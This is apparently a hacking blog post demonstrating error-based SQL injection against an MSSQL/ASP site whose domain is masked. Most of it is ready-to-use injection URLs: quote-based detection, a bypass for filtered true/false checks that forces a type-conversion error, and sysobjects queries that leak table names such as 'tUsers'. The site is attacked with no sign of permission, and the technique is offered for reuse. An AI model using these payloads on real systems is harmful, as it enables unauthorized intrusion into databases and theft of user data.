For many MSSQL databases, injection takes flexible technique and some thought, such as the logical-judgement method mentioned in the first article. Sometimes identifying an injection point does not rest solely on and 1=1 and and 1=2, as with this site:
http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25
Append a " ' " character to the end,
http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25'
and the error message is as follows:
Unclosed quotation mark before the character string 'M10-25''
Good, this should be an injection point. Next, try and 1=1,
http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25'%20and%20'1'='1
The page displays normally. Now try and 1=2,
http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25'%20and%20'1'='2
Still a normal page. It looks like the logical condition is being filtered, so is injection impossible? However, even if the logical condition can be filtered, an execution error cannot be. Given the unclosed quotation mark, we first make it throw an error, and only then append a logical condition for the filter to act on, closing off that " ' " character. With that approach, submit this statement:
http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25'%20and%20user>0%20and%20'1'='1
The error message is as follows:
Syntax error converting the nvarchar value 'dbo' to a column of data type int
See, it worked. So next time the logical condition is filtered, combine it with an execution error to carry out the injection.
Try this statement next,
http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25'%20and%20(select%20top%201%20name%20from%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype='U'%20order%20by%20name%20desc)%20a%20order%20by%20name)>0%20and%20'1'='1
The error message is:
Syntax error converting the nvarchar value 'tUsers' to a column of data type int
Good, the first table name is 'tUsers'.
Again,
http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25'%20and%20(select%20top%201%20name%20from%20(select%20top%202%20name%20from%20sysobjects%20where%20xtype='U'%20order%20by%20name%20desc)%20a%20order%20by%20name)>0%20and%20'1'='1
This time the error message is:
Syntax error converting the nvarchar value 'tTechnical' to a column of data type int
The second table name is 'tTechnical'.
OK, that is as far as I will take it. Let us keep learning together.